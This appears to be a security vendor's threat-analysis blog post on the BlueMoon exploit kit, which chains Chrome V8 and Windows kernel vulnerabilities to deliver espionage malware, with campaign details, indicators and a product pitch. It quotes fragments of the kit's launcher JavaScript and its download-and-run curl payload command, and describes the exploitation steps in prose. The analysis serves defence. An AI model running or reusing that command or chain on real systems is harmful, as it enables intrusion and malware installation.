How BlueMoon Exploits Chrome CVE-2026-85046 and CVE-2026-87491

Umut Bayram | 8 MIN READ

| October 08, 2026

Key Takeaways

  • BlueMoon Exploit Kit, first observed on August 28, 2026, turns visits to malicious websites into Windows malware execution.
  • The kit chains two V8 vulnerabilities with a Windows kernel exploit to run payloads outside the browser sandbox.
  • CVE-2026-85046, CVE-2026-87491, and CVE-2026-85880 enable V8 type confusion, sandbox escape, and kernel privilege escalation respectively.
  • Spearphishing emails lead victims to attacker-controlled exploit pages, some of which then redirect to legitimate websites.
  • Four espionage-focused threat clusters adopted BlueMoon to deliver GemStone, ShadowPad, a Rust loader, and custom .NET-staged malware.
  • The Picus Threat Library includes BlueMoon-related threats for testing defenses against V8 exploits and GemStone malware.

BlueMoon Exploit Kit is a malware delivery kit first observed on August 28, 2026. Campaigns targeted the US and Southeast Asia, including Vietnam, Indonesia, and Singapore, across nonprofit, mining, commodity trading, aerospace, manufacturing, government, consulting, and financial sectors [1].

It chains V8 type confusion and sandbox escape with a Windows kernel exploit. After checking the host, it raises the renderer’s privileges and injects code into the browser’s parent broker process to download and run a payload outside the renderer sandbox.

In this blog, we will explain how BlueMoon Exploit Kit works and show how Picus helps you test your security controls against this threat.

BlueMoon Exploit Kit at a Glance

Field

Detail

Malware type

Exploit kit for browser compromise and payload delivery

First observed

August 28, 2026, followed by adoption across four observed threat clusters

Target environment

Chrome and other Chromium-based browsers on Windows

Initial access

Spearphishing links to attacker-controlled exploit pages

Vulnerability chain

CVE-2026-85046 for V8 type confusion, CVE-2026-87491 for V8 sandbox escape, and CVE-2026-85880 for Windows kernel privilege escalation [1].

Observed payloads

GemStone, ShadowPad, a Rust loader, and custom malware using a .NET stage [1].

Persistence

Campaign-specific browser-extension installation, scheduled tasks, and registry changes.

What Is BlueMoon Exploit Kit?

BlueMoon is an exploit kit that turns a visit to an attacker-controlled website into malware execution on a vulnerable Windows host. It combines two vulnerabilities in the V8 JavaScript engine with a Windows kernel privilege-escalation vulnerability, then runs an operator-selected command outside the browser renderer sandbox.

BlueMoon separates exploitation from the final payload. Different campaigns used the same browser-to-Windows chain to deliver the GemStone browser extension, ShadowPad, a Rust loader, or a custom loader with an in-memory .NET stage. Their persistence mechanisms and command-and-control channels belong to those downstream components.

Four espionage-focused threat clusters adopted BlueMoon between late August and early September 2026. The earliest observed campaign began on August 28. Several clusters have a suspected China nexus. How the groups obtained the kit remains unknown.

How Does BlueMoon Exploit Kit Work?

Initial Access and Delivery

The infection starts with an email that includes a link. The link leads to attacker-controlled infrastructure that serves the exploit kit. Some landing pages display a loading message while exploitation runs, then redirect the browser to a legitimate destination.

For example, TA412 sent fake conference emails to US nonprofit groups, mining companies, and commodity traders. An email titled “Keynote Speaker” linked to asianstudies.secboxes[.]com, presenting the exploit page as a source of conference details. TA412's landing pages attempted exploitation before redirecting visitors to legitimate websites such as asianstudies.org.

Execution and Host Profiling

BlueMoon uses a JavaScript file named driver-html.js to control the exploit chain. It runs as a browser worker, starts the exploits, manages retries, and chooses which executable to download.

The launcher reads settings to control these downloads and retries. In the configuration code below, p() creates q, which reads those settings. The launcher starts in payload mode and reads exeurl to find the executable's URL [1]:

// Read the launch options through q.

var q = p();

var m = "payload"; // Use payload mode by default.

// Use msgbox.exe relative to the current page if no URL is set.

var e = q.get("exeurl") || new URL("msgbox.exe", location.href).href;

var s = q.get("stopAfter") || ""; // Read the optional stop setting.

var r = q.get("retry") !== "0"; // A value of 0 turns off retries.

var w = q.get("worker") !== "0"; // A value of 0 turns off worker use.

var a = gA(); // Save the value returned by the helper.

The launcher runs the JavaScript exploit code, which holds three Base64-encoded payload components. p1 loads a DLL that checks the host, and p2 loads the Windows kernel exploit DLL. After the kernel exploit succeeds, pp injects code into the browser’s parent broker process. That code calls CreateProcessA to run the payload download command outside the renderer sandbox.

BlueMoon can also encode its JavaScript modules with Base64. A wrapper, a piece of JavaScript that decodes and starts those modules, stores them in T_64, C_64, L_64, M_64, W_64, and B_64. It decodes them with atob(), then runs the tool, configuration, and loader modules [1]:

// The wrapper holds six Base64-encoded modules.

// Decode each module into a string for later use.

var T_s = atob(T_64);

var C_s = atob(C_64);

var L_s = atob(L_64);

...

The first exploit targets CVE-2026-85046 in V8's optimizing compilers. When an array's element type changes during sorting, the optimized code can treat a value as the wrong type. BlueMoon uses this type confusion to find object addresses and create fake object pointers. It then corrupts a Float64Array to read and write memory inside the V8 heap cage, the memory region V8 uses for its heap. This gives the next exploit the memory access it needs.

The next exploit, CVE-2026-87491, escapes the V8 sandbox. BlueMoon corrupts WebAssembly metadata and replaces compiled function code with the p1 shellcode. This shellcode reflectively loads a DLL. The DLL returns the Windows version and build, the process token’s integrity level, and the kernelbase.dll build version to the JavaScript. At this point, the code still runs inside the browser renderer process. The Windows kernel exploit then provides the privileges needed for the final injection into the broker process [1].

The JavaScript checks these results to see whether the kernel exploit supports the host and whether the renderer runs at low integrity. If the checks pass, p2 loads a second DLL. That DLL checks the Windows build again, then tries CVE-2026-85880. The exploit uses the ALPC communication and WNF notification mechanisms to gain kernel read/write access. It enables SeDebugPrivilege in the renderer's token, then returns a status value so the JavaScript can check whether it succeeded.

The full chain works only on certain Windows builds. The browser exploits affected the stable browser releases available during the campaigns, but the kernel exploit supported only older Windows builds. A vulnerable browser alone was therefore not enough for the full chain to succeed.

The launcher also tracks failures and retries. In fail(), RETRYABLE checks whether an error allows another attempt. For a retryable error, the launcher waits 100 milliseconds before trying again. If it cannot retry, it resets the count and sends a fail beacon with the error [1]:

function fail(errMsg) {

Tool.section("failure");

Tool.log(errMsg); // Log the error message.

var retryable = RETRYABLE.test(errMsg);

if (retryOn && retryable && attempt < MAX_ATTEMPTS) {

attempt++;

setAttempt(attempt); // Save the updated retry count.

Tool.log("retryable failure -> fresh attempt " + attempt + "/" + MAX_ATTEMPTS);

setTimeout(run, 100); // Try again after 100 milliseconds.

} else {

Tool.log("not retrying (retryable=" + retryable + ", attempt=" + attempt + ")");

Tool.log(">>> please send the full log back (copy it from the page)");

setAttempt(0); // Reset the count when retries stop.

beacon("fail", errMsg); // Send the failure result and error.

}

}

On success, succeed() logs the status, resets the retry count, and sends an ok beacon. These messages report whether the exploit worked. The installed backdoors use their own command channels [1].

Command Execution and Payload Deployment

By default, the command started through pp downloads msgbox.exe to %TEMP% and runs it. exeUrl we mentioned above holds the download URL. If no URL is set, the JavaScript uses msgbox.exe relative to the current page:

curl -sS -o "%TEMP%\msgbox.exe" "<exeUrl>" && "%TEMP%\msgbox.exe"

In some campaigns the download command downloaded several files. The downloaded files install different payloads, each with its own persistence and command channel. These behaviors belong to the delivered malware rather than the exploit kit itself.

For example, TA412's msgbox.exe installer extracts GemStone to C:\Users\Public\stomp_ext and registers it through modified browser preferences. GemStone pretends to be a Gemini browsing companion. Its background.js service worker collects keystrokes, cookies, browser storage, and screenshots. It uses a worker-hosted C2 server to receive commands and upload data.

Other campaigns use DLL sideloading. For example, In UNK_LateNight's campaign, the DLL decrypts A08744D2.tmp with AES and loads ShadowPad, a backdoor that steals Firefox profile data and captures network traffic. The chain uses a scheduled task named as EdgeCore_AutoUpdate for persistence, and ShadowPad communicates over HTTPS.

How Picus Simulates BlueMoon Exploit Kit Attacks?

We strongly suggest simulating BlueMoon Exploit Kit Attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Platform. You can also test your defenses against hundreds of other malware variants, such as BRICKSTORM, VenomRAT, Chinotto, and Rustonotto, within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for the BlueMoon Exploit Kit Attacks:

Threat ID

Threat Name

Attack Module

88669

Google Chrome V8 Engine Type Confusion Vulnerability Threat

Network Infiltration

54107

Google Chrome V8 Out of Bounds Write Vulnerability Threat

Network Infiltration

77492

APT31 Threat Group Campaign Malware Download Threat

Network Infiltration

52716

APT31 Threat Group Campaign Malware Email Threat

E-mail Infiltration

48727

GemStone Backdoor Malware Download Threat

Network Infiltration

65518

GemStone Backdoor Malware Email Threat

E-mail Infiltration

38949

GemStone Malware Downloader Download Threat

Network Infiltration

70215

GemStone Malware Downloader Email Threat

E-mail Infiltration

Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Platform.

References

[1] M. Kelly et al., "Once in a BlueMoon: Multiple state-aligned threat actors rapidly adopt novel exploit chain using Chrome and Windows zero-days," Proofpoint Threat Insight Blog, Sep. 9, 2026. [Online]. Available: https://www.proofpoint.com/us/blog/threat-insight/once-bluemoon-multiple-state-aligned-threat-actors-rapidly-adopt-novel-exploit. Accessed: Oct. 6, 2026.

 
 
BlueMoon Exploit Kit is a malware delivery kit that turns a visit to an attacker-controlled website into malware execution on a vulnerable Windows host. First observed on August 28, 2026, it chains two V8 JavaScript engine vulnerabilities with a Windows kernel privilege escalation flaw, then runs an operator-selected command outside the browser renderer sandbox.
BlueMoon uses three vulnerabilities. CVE-2026-85046 is a V8 type confusion flaw in the optimizing compilers, CVE-2026-87491 enables a V8 sandbox escape, and CVE-2026-85880 is a Windows kernel privilege escalation vulnerability. Together they move the attack from the browser renderer to code execution in the browser's parent broker process.
BlueMoon infects victims through spearphishing emails containing links to attacker-controlled exploit pages. Some landing pages show a loading message while exploitation runs, then redirect to a legitimate website. For example, TA412 sent fake conference emails titled "Keynote Speaker" that linked to an exploit page before redirecting visitors to asianstudies.org.
Four espionage-focused threat clusters adopted BlueMoon between late August and early September 2026, including TA412 and UNK_LateNight. Several of these clusters have a suspected China nexus. How the groups obtained the exploit kit remains unknown.
BlueMoon campaigns targeted the US and Southeast Asia, including Vietnam, Indonesia, and Singapore. Targeted sectors included nonprofit, mining, commodity trading, aerospace, manufacturing, government, consulting, and financial organizations.
GemStone is a malicious browser extension that TA412 delivered through BlueMoon, posing as a Gemini browsing companion. Its installer extracts it to C:\Users\Public\stomp_ext and registers it through modified browser preferences. Its background.js service worker collects keystrokes, cookies, browser storage, and screenshots, and uses a worker-hosted C2 server to receive commands and upload data.
Protecting against BlueMoon starts with breaking its exploit chain. The kernel exploit supports only older Windows builds, so a vulnerable browser alone is not enough for full compromise. Defenders should also watch for spearphishing links, unexpected msgbox.exe downloads to %TEMP%, unusual browser extension installs, and scheduled tasks such as EdgeCore_AutoUpdate.
The Picus Threat Library includes threats for simulating BlueMoon Exploit Kit attacks across the Network Infiltration and E-mail Infiltration attack modules. These cover Google Chrome V8 type confusion and out-of-bounds write vulnerabilities, APT31 campaign malware, and GemStone backdoor and downloader threats. Organizations can run these simulations with a 14-day free trial of the Picus Platform.

Table of Contents

Ready to start? Request a demo